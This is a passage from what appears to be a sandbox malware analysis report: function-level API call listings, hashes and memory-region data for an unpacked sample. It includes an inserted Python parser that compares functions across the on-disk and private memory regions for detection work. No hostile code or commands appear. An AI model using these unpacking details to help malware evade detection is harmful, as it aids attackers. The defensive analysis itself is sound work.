                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction ID: bf305711c351f3dadb84e76d88fdd0194d9a71be08566a7c9c65e0dd41fe3e85
                    • Opcode Fuzzy Hash: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction Fuzzy Hash: 98116071600911AFC708EB26EC02AD9F360FF54718F80412FE516539A2EF787955CA8C
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,1F0F83C3,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 004249AC
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction ID: 20409b734b108c2c2fdfc696bb707ba8dd51a7162063a93118c7aaaaa135de39
                    • Opcode Fuzzy Hash: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction Fuzzy Hash: B0118271600911AFC708EB26EC02AD9F360FF54718F80412FE516439A2EF787955CA8C
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044E1041
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 044E104E
                    • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 044E10A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
                    • String ID: @[F
                    • API String ID: 220083066-1227568360
                    • Opcode ID: 2f05aafc6545dd2f02b0a4a7403fc2fb1387cc79212c786ca64f800411f26202
                    • Instruction ID: 8efa52dd9b8878f118dd8f6e6308ad07cfe5bb6903abc6dd303b12787e25b5e0
                    • Opcode Fuzzy Hash: 2f05aafc6545dd2f02b0a4a7403fc2fb1387cc79212c786ca64f800411f26202
                    • Instruction Fuzzy Hash: 7501B5B0E047619AEF20AFFB546437E67E0AF44705F50006FD505EB782EFB469014396
                    APIs
                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A212
                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A236
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A249
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                    • String ID: pScheduler
                    • API String ID: 246774199-923244539
                    • Opcode ID: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction ID: 1c324d8570b02ec0d7fbee642b19b31dd6212496db4bd76d71850650a4a55e5c
                    • Opcode Fuzzy Hash: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction Fuzzy Hash: 23F02B35B00224E7C324FA41F84295EB3759F907157A0445FED0127682DF7D9A09C6AA
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,044F0D9D,000000FF,0000000C), ref: 044E01A8
                    • GetLastError.KERNEL32(?,044F0D9D,?,00430A36,?,?,?,?,?,?,044E6025,?), ref: 044E01B7
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044E01CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction ID: bb85c0ee88b5ba719ea89aeb4053f16b488cb56a2c407dff470f740375ba511d
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 06F0A03450020EFBDF00EFA2DD44EAF777C6F00706F200516B921E61D2DA35E6049B64
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,00430B36,000000FF,0000000C), ref: 0041FF41
                    • GetLastError.KERNEL32(?,00430B36,?,00430A36,?,?,?,?,?,?,00425DBE,?), ref: 0041FF50
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FF66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction ID: b1894cb517c06a3f85e37dbbb0dbc8aa4abe9868d7e3a5819c2c87bac6c50229
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 90F0A03560020ABBCF00EFA1DD05EEF376C6B04715F200526B625E50E2DA38EA44A768
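The two RegisterWaitForSingleObject blocks directly above carry the same Opcode ID (a40a85c5…) but different Instruction IDs, once for the region at 044C0000 (based on PE: false, so not backed by a module on disk) and once for the image at 00400000; the CatchIt/EncodePointer pair earlier in the listing shows the same pattern. That is the signal an analyst wants to pull out of a dump like this: which functions exist in both the loaded image and a private executable region, and which Win32 APIs the non-PE code calls directly. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin. It works on the report's own block layout, with a sample input constructed from blocks copied (and abbreviated) from this page. The reading of Opcode ID as a hash over the instruction opcodes with operands masked, and Instruction ID as a hash over the full encoded instructions, is an assumption stated here rather than something the report spells out; under that assumption an Opcode ID match with differing Instruction IDs is what the same function looks like when it sits at two base addresses.

```python
import re
from collections import defaultdict

# Constructed sample input: three function blocks copied from the report above,
# trimmed to the lines the parser uses. One "Part of subcall" line is kept
# (with its argument list abbreviated) to show that callee detail is skipped.
SAMPLE = """\
APIs
• RegisterWaitForSingleObject.KERNEL32(?,6C,?,044F0D9D,000000FF,0000000C), ref: 044E01A8
• GetLastError.KERNEL32(?,044F0D9D,?,00430A36,?,?,?,?,?,?,044E6025,?), ref: 044E01B7
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044E01CD
Memory Dump Source
• Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
• Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
• Instruction ID: bb85c0ee88b5ba719ea89aeb4053f16b488cb56a2c407dff470f740375ba511d
APIs
• RegisterWaitForSingleObject.KERNEL32(?,6C,?,00430B36,000000FF,0000000C), ref: 0041FF41
• GetLastError.KERNEL32(?,00430B36,?,00430A36,?,?,?,?,?,?,00425DBE,?), ref: 0041FF50
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FF66
Memory Dump Source
• Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
• Instruction ID: b1894cb517c06a3f85e37dbbb0dbc8aa4abe9868d7e3a5819c2c87bac6c50229
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 004427FC
• _free.LIBCMT ref: 004427EA
  • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170), ref: 0043AEAB
Memory Dump Source
• Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
• Instruction ID: 4144492f74be2ab261ac73441af81b9bed5bd636e8574888bf5b0065352f6d8b
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"; Name may contain "::"
API_RE = re.compile(r"^•\s+(?P<name>.+?)\.(?P<module>[A-Z][A-Z0-9_]*)(?:\(|\s+ref:)")
SRC_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)")
OPC_RE = re.compile(r"Opcode ID:\s*(?P<id>[0-9a-f]{64})")
INS_RE = re.compile(r"Instruction ID:\s*(?P<id>[0-9a-f]{64})")


def parse_blocks(text):
    """Split report text into function blocks; each block starts at an 'APIs' line."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "offset": None, "pe": None, "opcode_id": None, "instr_id": None}
            blocks.append(cur)
            continue
        if cur is None or line.startswith("• Part of subcall"):
            continue  # callee detail belongs to another function, not to this block
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m["name"], m["module"]))
            continue
        m = SRC_RE.search(line)
        if m:
            cur["offset"], cur["pe"] = m["offset"], m["pe"] == "true"
            continue
        m = OPC_RE.search(line)
        if m:
            cur["opcode_id"] = m["id"]
            continue
        m = INS_RE.search(line)
        if m:
            cur["instr_id"] = m["id"]
    return blocks


def shared_opcodes(blocks):
    """Opcode IDs recorded in more than one dump region -> {opcode_id: {offset: instruction_id}}."""
    by_opcode = defaultdict(dict)
    for b in blocks:
        if b["opcode_id"] and b["offset"]:
            by_opcode[b["opcode_id"]][b["offset"]] = b["instr_id"]
    return {k: v for k, v in by_opcode.items() if len(v) > 1}


def win32_calls_in_non_pe_regions(blocks):
    """Direct KERNEL32/NTDLL calls made from code that is not backed by a PE file on disk."""
    out = set()
    for b in blocks:
        if b["pe"] is False:
            out.update(name for name, module in b["apis"] if module in ("KERNEL32", "NTDLL"))
    return out


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for opc, regions in shared_opcodes(parsed).items():
        print(opc[:16], {off: iid[:8] for off, iid in regions.items()})
    print(sorted(win32_calls_in_non_pe_regions(parsed)))
```

Run against the full report text instead of SAMPLE, the first function gives a list of functions duplicated between the on-disk image and the private 044C0000 region, and the second gives the API surface reachable from the non-PE region alone, which is the set worth checking first when writing a detection or a YARA rule for the unpacked payload.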
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@$This function cannot be called on a default constructed task
                    • API String ID: 2659868963-4211761357
                    • Opcode ID: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction ID: 61496bd6a01842805568ee1c9490c26cdbd20980f2f353701ae25422a6d128cf
                    • Opcode Fuzzy Hash: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction Fuzzy Hash: 48F0A770D1020CABC710DF68984159EFBF89F15305F1082AFEC4067301EBB51A58CB99
                    APIs
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 044DD53D
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,044DD4AD,00000064,?,0045007C,?,044C78C4,00468650), ref: 044DD54E
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 044DD555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeaveObjectSingleWait
                    • String ID: WF
                    • API String ID: 501323975-2907287748
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: fcf1b9fe2272400b798edc520838b4a6da70402d70b73bc2f592014bae19fcd8
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: DFE01235941B24F7CF122B54FC58B9E3F28EB09753F044072F90996161D765A9019BDE
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,00462014), ref: 044C8081
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044C80E2
                    • GetProcAddress.KERNEL32(00000000), ref: 044C80E9
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044C81AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction ID: d8550d9b075ddc25e5ef17dd14d4ac50a6dd2cbe3d13ae945c196f7bfabc77ca
                    • Opcode Fuzzy Hash: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction Fuzzy Hash: 72D13774F00254ABEF14BF29CD0A7AD7B61AB41325F58029ED805673C2EB756E808BC3
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction ID: fa31b20e564b8db1ee3706b80767e1f2185a165866df2a486a219cb87919d6e0
                    • Opcode Fuzzy Hash: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction Fuzzy Hash: 79B10A71D0424A9FEF25CF28CC80BAEBBE5FF45344F14816BDA569B381D635A942CB60
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction ID: 7e71781bbfdb81641079919ac07b49ba12931590954ee84f1c7785d69e78186a
                    • Opcode Fuzzy Hash: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction Fuzzy Hash: 0FB124329002859FDB15CF28C8C17AEBBE5EF59350F25A16BE845BB341D63C9D02CB69
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction ID: cbdb336828cfa61d67c4c98c0acfd5db2bdf345cf414e80455fa941e08ac4891
                    • Opcode Fuzzy Hash: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction Fuzzy Hash: 5D51AE72600216BFEF299F15DC51BAA77A4FF44706F14412FEA0287692E731F891CB50
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction ID: b9fc1319993f16ce4fdb72853175d02b605fe766e2192af1e1eb381543aa3c59
                    • Opcode Fuzzy Hash: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction Fuzzy Hash: 2851E072601A06AFDB288F51D841BABB7A4EF48310F14156FEC0147391E739EC51CF98
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 044C8630
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044C8697
                    • GetProcAddress.KERNEL32(00000000), ref: 044C869E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction ID: 079d211b12d69135ae486ff5704152ac2c845dbb21dc8796bedead6f701fd3bc
                    • Opcode Fuzzy Hash: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction Fuzzy Hash: 29515B74E012089BEF24EF25CD487DDB774EB45311F5446AEE804A73C1EB35AE808B95
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,1F0F83C3), ref: 004083C9
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408430
                    • GetProcAddress.KERNEL32(00000000), ref: 00408437
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: e5634ea80967d0c977d17dcc0ac20768d6f5dcf74e96f42855ee01175a53a337
                    • Instruction ID: 2669896dabc0e4ffefeed8579a88ac15b202beb4dd7596f0f9752e6226651e62
                    • Opcode Fuzzy Hash: e5634ea80967d0c977d17dcc0ac20768d6f5dcf74e96f42855ee01175a53a337
                    • Instruction Fuzzy Hash: C0510870900208ABDB14EF64DE497DEBB74EB45314F5042BEE855A72C2EF399AC08B59
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: 436f636bcc004c2f1e241847a141636d76b833363a3770d2cee7e3871b421f6e
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: FA518C35A04209AFDF20CF69C880AAEBBF4EF05314F14449ADE51A7352D732BA45CB91
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: 79a7c196a4a87a90b7f5eed02673632fb3c179273ff44878c0118b676a9e0162
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: 725188359042099FDF10CFA8C4826EFBBF5FF99324F24549AE850A7351D33AA945CB94
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                    • String ID:
                    • API String ID: 3264154886-0
                    • Opcode ID: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction ID: ae9bfec8e5d58dd46b6de234b0327c5bf184f47e6e5dfa4b06022e8470957187
                    • Opcode Fuzzy Hash: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction Fuzzy Hash: DA41ACB4A00615ABEF21DFA5C99475BB7E8AF05318F04852ED815D7791EB34FA00CB81
                    APIs
                    • _free.LIBCMT ref: 045063A5
                    • _free.LIBCMT ref: 045063CE
                    • SetEndOfFile.KERNEL32(00000000,04501D11,00000000,044FAF99,?,?,?,?,?,?,?,04501D11,044FAF99,00000000), ref: 04506400
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,04501D11,044FAF99,00000000,?,?,?,?,00000000), ref: 0450641C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: 4db70c3c22ec6f032e069c98e453d2cfda831462f961d168723713965d6d8971
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: 0A412A3A9006019BEF20AFA9DC41BCE37A5FF85364F248515F514A71D1EB34F822A7A1
                    APIs
                    • _free.LIBCMT ref: 0044613E
                    • _free.LIBCMT ref: 00446167
                    • SetEndOfFile.KERNEL32(00000000,00441AAA,00000000,0043AD32,?,?,?,?,?,?,?,00441AAA,0043AD32,00000000), ref: 00446199
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00441AAA,0043AD32,00000000,?,?,?,?,00000000), ref: 004461B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction ID: 2d08f1c89283f971e2dbc99742b5c5d2ec6674a103a1ef792aed1683b5bdd9d4
                    • Opcode Fuzzy Hash: 43f67a75f22ce9da099f53d76b41ff6f7a508358a2dac8ec91fa310dbaf7f26c
                    • Instruction Fuzzy Hash: A84107729006009AEB11AFBA8C46B8E3775AF4A364F16151BF914A7292D63CC840476A
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 00402F1F
                    • GetCurrentThreadId.KERNEL32 ref: 00402F3E
                    • __Mtx_unlock.LIBCPMT ref: 00402F8C
                    • __Cnd_broadcast.LIBCPMT ref: 00402FA3
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    Memory Dump Source
